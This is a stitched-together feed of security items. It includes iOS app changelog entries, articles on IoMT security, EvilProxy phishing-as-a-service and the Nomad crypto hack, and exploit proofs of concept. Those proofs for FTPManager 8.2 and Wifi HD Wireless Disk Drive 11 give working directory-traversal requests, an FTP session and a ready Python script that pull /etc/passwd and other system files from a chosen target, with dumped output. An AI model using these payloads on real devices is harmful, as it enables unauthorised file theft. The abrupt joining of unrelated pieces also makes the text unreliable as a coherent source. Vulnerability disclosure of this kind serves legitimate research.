FTPManager version 8.2 suffers from local file inclusion and directory traversal vulnerabilities.

    # Exploit Title: FTPManager 8.2 Local File inclusion# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: Ios 15.6GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.1.178:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------------------HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Wed, 13 Jul 2022 10:35:46 GMTDate: Tue, 06 Sep 2022 03:05:05 GMTContent-Length: 2581Cache-Control: max-age=3600, publicEtag: 1152921500312311384/1657708546/0### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false---------------------------------------------------# Exploit Title: FTPManager 8.2 Directory Traversal (ftp)# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6#ftp 192.168.1.178 2121Connected to 192.168.1.178.220 ---------- Welcome to FTPManager ----------Name (192.168.1.178:chokri):230 User chokri logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /../../../../../../../../../../../../../../../../250 OK. Current directory is/../../../../../../../../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        576 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        160 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        672 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1132 Jan 01 1970 devdrwxr-xr-x     0 root admin       3968 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp> cd private/etc250 OK. Current directory is/../../../../../../../../../../../../../../../../private/etcftp> get passwdlocal: passwd remote: passwd200 PORT command successful.150 Opening BINARY mode data connection for 'passwd'.226 Transfer complete.2581 bytes received in 0.00 secs (11.5020 MB/s)ftp> get serviceslocal: services remote: services200 PORT command successful.150 Opening BINARY mode data connection for 'services'.226 Transfer complete.677977 bytes received in 0.17 secs (3.8257 MB/s)---------------------------------------------------# Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6from ftplib import FTPimport argparsehelp = " FTPManager 8.2 Local File inclusion by chokri hammedi"parser = argparse.ArgumentParser(description=help)parser.add_argument("--target", help="Target IP", required=True)parser.add_argument("--file", help="File To Open eg: etc/passwd")args = parser.parse_args()ip = args.targetport = 2121 # Default Portfiles = args.fileftpConnection = FTP()ftpConnection.connect(host=ip, port=port)ftpConnection.login();def downloadFile():ftpConnection.cwd('/../../../../../../../../../../../../../../../../')        ftpConnection.retrbinary(f"RETR {files}", open('data.txt','wb').write)        ftpConnection.close()        file = open('data.txt', 'r')        print (f"[***] The contents of {files}\n")        print (file.read())downloadFile()

FTPManager 8.2 Local File Inclusion / Directory Traversal

The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage.

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.9-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.9-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.9-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.9-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.9-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.9-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.9-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.9-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.9-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.9-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release:

*   Upgrade encryption used in Event Rules with passwords (GMAIL, IMAP, etc) #175
*   Improve HTTP API server error handling when presented with bad query params #174
*   Turn off HTTP API endpoint /blink1/inputs for increased security #174
*   Allow "instant" color changes in Color Picker and Big Buttons with fadeTime = 0.0 seconds, min was 0.1 seconds #173
*   Show HTTP API accesses in Recent Events log #172
*   Allow IFTTT Event Source to follow redirects for HTTP -> HTTPS conversion #171
*   Add HTTP API endpoint /blink1/enumerate to cause USB rescan #170
*   HTTP API endpoint /blink1/patterns now show per-pattern repeats and playing attributes #169
*   Some blink(1) mk2 devices that were not detected in 2.2.8 now are #168, #166

**Full Changelog**: v2.2.8...v2.2.9

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.8-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.8-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.8-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.8-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.8-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.8-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.8-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.8-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.8-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.8-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release:

*   Ubuntu 22 crash #166
*   Cannot control multiple blink(1) devices correctly #168

Other changes:

*   BigButton assigned blink(1) device radio menu shows default selection better
*   blink(1) serial number selection works correctly for certain blink(1)s w/ serial numbers w/ lower case hex digits
*   Update Electron 12 -> 18
*   Update build tools: webpack 3.3 -> 4.1, babel 7.10 -> 7.16

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.7-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.7-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.7-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.7-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.7-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.7-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.7-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.7-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.7-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.7-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release

*   Fix Script and File forms to allow file or script selection in some instances, #161
*   Disallow multiple instances (again), #165

Fix Script and File forms

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.5-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.5-mac-x64.zip - Mac Intel zip file
*   Windows
    
    *   Blink1Control2-2.2.5-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.5-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.5-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.5-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.5-linux-amd64.deb - Linux x86 64-bit Debian package

Fixes:

*   Fix "cert expired" error by updating electron from 8.3.4 to 12.2.2 to Lets Encrypt X3 DST cert

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.4-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.4-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.4-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.4-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.4-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.4-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.4-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.4-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes/Fixes in this release:

*   Issue #143: Alarms set for 12:xx am or 12:xx pm fire at the wrong time
*   Issue #142: Add /blink1/lastColor API endpoint
*   Issue #141: API query args to specify blink1\_id not congruent
*   Issue #106 and others: "Start at login" not working on Windows (hopefully fixed now)

Also, updated to Electron v8, updated node-hid and node-blink1, updated Mac and Windows app signing process.

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.3-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.3-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.3-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.3-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.3-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.3-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.3-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.3-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes/Fixes in this release:

*   Issue #116: Crash when using non-allowed accelerator key for "Reset Alerts"
*   Issue #115: blink(1) flashing gets slower when main window is minimized
*   Update node-hid & node-blink1 to latest
*   Add ability to set "nightlight mode" aka "no-computer mode" in Prefs page :

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.2-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.2-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.2-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.2-win-x64.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.2-win-ia32.zip - Windows zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.2-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.2-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.2-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes//Fixes in this release:

*   Issue #98 – can't right-click BigButtons, add new UI element for non-right-click folk
*   Issue #106 – error on startup in some situations
*   Issue #108 – not detecting some Skype events
*   Issue #109 – allow CORS requests to HTTP API server
*   Issue #114 – IMAP "use SSL" button was broken
*   package updates
    *   Electron v3 -> v4
    *   Babel v6 -> v7
    *   Webpack v1 -> v4

Blink1Contro2 v2.2.1

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.1-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.1-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.1-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.1-win-x64.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.1-win-ia32.zip - Windows zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.1-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.1-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.1-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes in this release:

*   BigButtons: add context button as alternative to right-click, fix right-click (#98)
*   Fix /blink1/{on,off} for multiple blink(1) devices (#104)
*   Betting input validation on "secs" field in color chooser (#102)
*   Improve meta-pattern parsing for file/script/url event sources (#101)
*   Update to electron 1.8.8, electron-builder 20.36.2, electron-updater 4.0.4

Download the preferred version for your platform:

*   Mac
    *   Blink1Control2-2.2.0-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.0-mac.zip - Mac zip file
*   Windows
    *   Blink1Control2-2.2.0-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.0-win.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.0-ia32-win.zip - Windows zip (32-bit)
*   Linux
    *   Blink1Control2-2.2.0-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.0-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

CVE-2022-35513: Releases · todbot/Blink1Control2

The high stakes and unique priorities for Internet of Medical Things devices require specialized cybersecurity strategies.

The Internet of Medical Things (IoMT) arguably stands alone when it comes to the threshold of comprehensive IoT security that healthcare delivery organizations must continually meet. Hospitals, physician practices, and integrated delivery systems need to not only keep their own organizations' Web-connected devices and equipment always compliant and secure, but they also must ensure patient safety isn't at risk (and avoid the significant reputational harm that comes from a public breach).

Adding to this challenge is that healthcare organizations tend to deploy uniquely heterogeneous fleets of IoMT devices that contain higher volumes of particularly vulnerable legacy devices. No other industry harnessing IoT capabilities has stakes as high as healthcare, nor such challenging obstacles. As a result, healthcare security teams must carefully craft approaches to address and mitigate certain risks that simply don't exist in other modern IoT implementations.

There are three key points to understand when building an effective IoMT vulnerability management and security strategy. First, because they face thousands of new vulnerabilities every month, IoMT security teams must pick their battles. Second, managing high device churn means introducing security from the moment of adoption. And third, security leaders must form collaborative teams of experts to manage myriad high-risk devices.

**1\. Pick Your Battles**

On average, IoMT device manufacturers publish 2,000 to 3,000 vulnerabilities _every month_. However, they publish patches for only about one in 100 at best. Healthcare delivery organizations can't simply scan IoMT devices for vulnerabilities because doing so will cause many legacy devices to crash. Security teams may attempt to just segment every device for vulnerability remediation and mitigation, but doing this for every device is complex — and maintaining such a segmentation for IoT and IoMT is even more so. Teams cannot rely on scans, don't have nearly enough patches, and new devices are continually added. Soon enough, segmentation erodes and security teams end up with a flat network.

Here's the good news: Just 1% to 2% of IoMT vulnerabilities actually present a high risk in their given environment. An IoMT device's actual risk is very much a function of environmental specifics — a device's connections, nearby devices, its particular use case, and so on. By conducting an _environment-specific_ exploit analysis, security teams can identify a device's true risks and concentrate their finite resources accordingly. Segmentation and other techniques can then focus on fixing the top 1% to 2% of high-risk devices and vulnerabilities.

Security teams should also be aware that attackers are playing this same game — they're probing for vulnerabilities within environments that can serve as springboards for their attack chains. A simple IoMT monitoring device with no data or significant effect on patient outcomes can still become the first domino in a major security event.

**2\. Introduce Security at Adoption**

Security teams must grapple not only with entrenched legacy IoMT devices, but ever-changing device inventories that churn at a rate of 15% per year. To counter this difficulty, security leaders must demand a seat at the decision-making table when new devices are adopted — or at the very least, a heads-up to properly analyze and address vulnerabilities before devices enter active use. That level of consideration is standard across other industries and must be foundational for an effective IoMT security strategy.

In fact, in most other industries an IT department could veto the adoption of solutions that pose a security liability for the organization. Within healthcare delivery organizations, however, IoMT devices with security issues may nevertheless be essential to the higher-priority goal of providing exceptional patient care and patient experiences. That said, healthcare organizations that incorporate security into their IoMT device _acquisition_ processes enable better ongoing security and risk remediation outcomes.

**3\. Form Collaborative Teams of Experts**

Unlike in industries where CSOs might manage homogeneous arrays of inexpensive IoT sensors and have carte blanche to dismiss devices that present any risk they don't like, healthcare demands an entirely different, and holistic, decision-making process. Clinicians carry tremendous weight when it comes to technology decisions because an IoMT device with high risk from an IT security perspective might significantly reduce risks to a patient from a health perspective. IoMT devices that enhance the patient experience, such as vulnerable NICU cameras that nevertheless allow parents to view their newborns, may also justify putting security teams in a tough position.

While it is understandable to decide in favor of supporting health outcomes, security leaders must be prepared to introduce protections that facilitate those decisions. Maximizing IoMT security effectiveness in these challenging circumstances requires security leaders to build an expert team with substantial collected knowledge of current threats and a collaborative mindset enabling the preparation of optimal countermeasures.

**Make IoMT Security an Organizational Priority**

Healthcare security leaders must help their organizations to recognize the tremendous importance and value of IoMT security, even if patient outcomes and experiences come first. At the same time, security leaders should not be daunted by the difficulty of IoMT risk management. Every small step that reduces risk paves the road to a strong security posture.

The 3 Fundamentals of Building an Effective IoMT Security Strategy

Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.

    # Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion# Date: Aug 13, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: http://www.savysoda.com# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976# Version: 11# Tested on: iPhone OS 15_5GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.100Connection: closeUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1Referer: http://192.168.1.103/Accept-Language: en-GB,en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflate-----------------HTTP/1.1 200 OKContent-Disposition: attachmentContent-Type: application/downloadContent-Length: 213Accept-Ranges: bytesDate: Sat, 13 Aug 2022 03:33:30 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

Wifi HD Wireless Disk Drive 11 Local File Inclusion

The phishing-as-a-service offering targets accounts from tech giants, and also has connections to PyPI phishing and the Twilio supply chain attack.

A phishing-as-a-service offering being sold on the Dark Web uses a tactic that can turn a user session into a proxy to bypass two-factor authentication (2FA), researchers have found.  

The service, widely called EvilProxy, uses reverse proxy and cookie-injection methods to give threat actors a way around 2FA "on the largest scale, without the need to hack upstream services," researchers from Resecurity said in a report published Monday. The principle is actually fairly simple, they added: After victims are lured to a phishing page, threat actors use a reverse proxy to fetch all the legitimate content users expect to see — including login pages — and then sniff victims' traffic as it passes through the proxy.

"This way they can harvest valid session cookies and bypass the need to authenticate with usernames, passwords, and/or 2FA tokens," researchers wrote.

At the same time, the approach gives cybercriminals ways to attack developers to facilitate supply chain attacks that affect customers downstream, they said.

In recent attacks, EvilProxy is being used to target consumer accounts belonging to top tech power players such as Apple, Dropbox, Facebook, GoDaddy, Google, Instagram, Microsoft, Twitter, and Yahoo.

**EvilProxy: An Evolution**

EvilProxy represents an evolution in phishing strategies, according to the report, given that reverse-proxy approaches are most commonly seen in advanced persistent threat (APT) and cyber-espionage activity. Now, the service makes this capability widely available to the cybercriminal marketplace, researchers said.

Some sources refer to the EvilProxy service as "Moloch," which is connected to a previously developed phishing kit that targeted the financial institutions and e-commerce sector, researchers said.

However, EvilProxy has different victims in mind, according to a demonstration video its actors released in May. Google and Microsoft accounts, in particular, appear to be the primary targets of EvilProxy threat actors.

**Acquiring the Service**

Cybercriminals can buy EvilProxy on a subscription basis based on the online service they plan to target — such as Facebook or LinkedIn — after which it is activated for a specific period of time, depending on the plan description, researchers said. Plan options include 10, 20, or 31 days, according to listings for the service on multiple Dark Web hacker forums, they said.

One of EvilProxy's key actors goes by the handle "John\_Malkovich" and acts as an administrator to vet new customers on major underground communities, including XSS, Exploit, and Breached, researchers said.

Cybercriminals can pay for EvilProxy via an operator on Telegram in a manual arrangement that deposits the funds received to an account in a customer portal hosted in TOR. The service also is available on the Dark Web hosted on the TOR network, with a kit available for $400 per month.

The home portal of the EvilProxy service makes it easy for those who purchase it to get on with their phishing campaigns, providing multiple tutorials and interactive videos regarding the use of the service and configuration tips, researchers said.

"Being frank, the bad actors did a great job in terms of the service usability, and configurability of new campaigns, traffic flows, and data collection," they acknowledged.

Once the service is activated, an operator must provide SSH credentials to further deploy a Docker container and a set of scripts that, after successful activation, will forward the traffic from the victims via two gateways defined as "upstream."

As is common in phishing campaigns, attackers register domain names that appear similar in spelling to related online services to mask them for use used in phishing campaigns, researchers noted.

**Connections to Recent Supply Chain Cyberattacks**

EvilProxy is notable also for its connections to recent threat activity — the first known phishing attack on users of the Python Package Index (PyPI), the official repository for the Python language, and a supply chain attack related to a credential breach at Twilio, researchers said.

Regarding the former, EvilProxy supports attacks against PyPI with the inclusion of a payload called JuiceStealer to the service, researchers said. The info-stealing malware was used in the PyPI phishing attack, and suspiciously added to EvilProxy just before that attack happened, researchers said.

EvilProxy also supports attacks on GitHub and the widely used JavaScript package manager NPJMS. This enables the service to deliver advanced phishing campaigns for supply chain attacks by targeting software developers and IT engineers, who may inadvertently add compromised code to applications and widen the spread of the attack without end users suspecting a thing, researchers said.

Indeed, the Twilio attack was a reminder of what can happen when enterprises are caught unawares, noted one security professional. In that attack, threat actors used phished Okta credentials to gain access to internal systems, applications, and customer data, affecting about 25 downstream organizations that use Twilio's phone verification and other services.

"Too many organizations assume that strong authentication is enough to protect their internal assets and data," Ronen Slavin, co-founder and CTO of Cycode, a software supply chain security solution provider, tells Dark Reading. "As a result of this mindset, most organizations over-credential their developers and expose way too many hard-coded secrets in places like repos, build logs, containers, and more."

With phishing attacks getting more advanced in both their methods to bypass security protections and target developers, enterprises need to be more wary of who within the organization has advanced access to systems, he adds.

"The key learning from this attack is to assume that developer accounts are compromised and that insiders could be malicious," Slavin says.

EvilProxy Commodifies Reverse-Proxy Tactic for Phishing, Bypassing 2FA

By Owais Sultan
Nomad Crypto incident was reported in August 2022 in which $190 million were stolen in a series of hacks.
This is a post from HackRead.com Read the original post: The Lessons to Learn from Nomad Crypto Hack

In what sounds like a case of gross negligence, Nomad, a new start-up in the cryptocurrency space, lost $190 million in a series of hacks. But in this instance, calling it hacks is being too nice. Usually, hackers require skills and strategies that take time and effort to execute. 

Apparently, in Nomad’s case, the attacks were a “free-for-all” crypto spree where anyone, even people with no prior **IT skills**, could seize on the platform’s shortcomings and withdraw crypto from its accounts. To make matters worse, the hackers could even withdraw more that was available in the accounts. 

If you’re baffled like we are, grab onto your socks and keep reading to learn more about what might have transpired at Nomad.

**What is Nomad Crypto Startup?**

Nomad is a crypto wallet or bridge that lets you transfer crypto from one blockchain network to another safely and conveniently. Obviously, not. But **crypto bridges** work by wrapping tokens on one network to an equivalent amount on another. This might sound complicated, but it’s really not. Think of wrapped tokens as representations of the value of the original token on other platforms. 

Furthermore, Nomad is a blockchain messaging platform that allows players such as developers to share arbitrary data across chains and even make **smart contracts**. The service makes online collaborations when developing blockchain applications while working from different regions much more convenient. 

**What Safety Considerations Should You Have When Buying Crypto?**

It’s unfortunate, but the world of **cryptocurrency** is cutthroat in every sense of the word. On the business side, hundreds of currencies exist, and more are joining the market every day, driving up the competition. There are also hundreds of different crypto products at various stages of their development process. Furthermore, we are also only starting to understand the real implications of blockchain technology and cryptocurrencies.

Unfortunately, this has also created the perfect storm for scammers and players with malicious intent to thrive. For instance, **in the case of Nomad**, even though we still maintain that this is a case of gross negligence, it also reflects the prevalent evils in this space. However, vulnerabilities, where anyone can just walk into a platform and withdraw more than there is, should not exist in the first place. 

The pill is easier to swallow when you hear hackers went on a phishing expedition or discovered a system flaw that moves the industry’s security forward. As such, you should be very keen with any dealings or transactions you make with crypto to avoid being one of the victims. 

One way to protect yourself is to **buy crypto with a prepaid card** that does not link back to your primary accounts or personal information. This will limit your risk of losing more than is on the prepaid card if you get hacked or compromised somehow. 

You should also only sign on to crypto services like bridges, wallets, exchanges, and currencies on reputable platforms with a proven safety record. As important as first adapters are to the product introduction cycle, we can all agree it’s safer to step back from new ones in the crypto scene. This will ensure you’re not one of the people who lose their investments from hacks like the one witnessed at Nomad.

**A problem to Solve**

The truth is that stories of people invested in a new crypto venture losing their money are **common in the news today**, and we have all but grown numb and accustomed to them. But it should not be this way. 

For far too long, hackers and ill-prepared crypto platforms have cost far too many their crypto investments and confidence in the system. And even though, in Nomad’s case, they have attempted to recover the lost funds, we think it’s time authorities take a hard look at the **crypto industry** and provide lasting solutions to the problems that plague it.

1.  **United States Blacklists the Infamous Tornado Cash**
2.  **MetaMask to Apple Users: Disable iCloud Backup for Wallets**
3.  **If the Ethereum Merge Fails, L2s Will Be More Vital Than Ever**
4.  **Scammers Made Deepfake AI Hologram of Binance Executive**
5.  **$625 million from Axie Infinity stolen in fake LinkedIn job scam**

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

The Lessons to Learn from Nomad Crypto Hack

A new phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy is being advertised on the criminal underground as a means for threat actors to bypass two-factor authentication (2FA) protections employed against online services.
"EvilProxy actors are using reverse proxy and cookie injection methods to bypass 2FA authentication – proxifying victim's session," Resecurity researchers said in a Monday

A new phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy is being advertised on the criminal underground as a means for threat actors to bypass two-factor authentication (2FA) protections employed against online services.

"EvilProxy actors are using reverse proxy and cookie injection methods to bypass 2FA authentication – proxifying victim's session," Resecurity researchers said in a Monday write-up.

The platform generates phishing links that are nothing but cloned pages designed to compromise user accounts associated with Apple iCloud, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter, Yahoo, and Yandex, among others.

EvilProxy is similar to adversary-in-the-middle (AiTM) attacks in that users interact with a malicious proxy server that acts as a go-between for the target website, covertly harvesting the credentials and 2FA passcodes entered in the login pages.

It's offered on a subscription basis per service for a time period of 10, 20, or 31 days, with the kit available for $400 a month and accessed over the TOR anonymity network after the payment is arranged manually with an operator on Telegram. Attacks against Google accounts, in contrast, cost up to $600 per month.

EvilProxy (Phishing-as-a-Service) - Google 2FA from Resecurity on Vimeo.

"After activation, the operator will be asked to provide SSH credentials to further deploy a Docker container and a set of scripts," Resecurity said, adding the technique mirrors that of another PhaaS service called Frappo that came to light earlier this year.

While the sale of EvilProxy to prospective customers is subject to vetting by the actors, it goes without saying that the service offers a "cost-effective and scalable solution" to carry out social engineering attacks.

The development is further an indication that adversaries are upgrading their attack arsenal to orchestrate sophisticated phishing campaigns targeting users in a manner that can defeat existing security safeguards.

To add to the concerns, the targeting of public-facing code and package repositories such as GitHub, NPM, PyPI, and RubyGems suggests that the operators are also aiming to facilitate supply chain attacks via such operations.

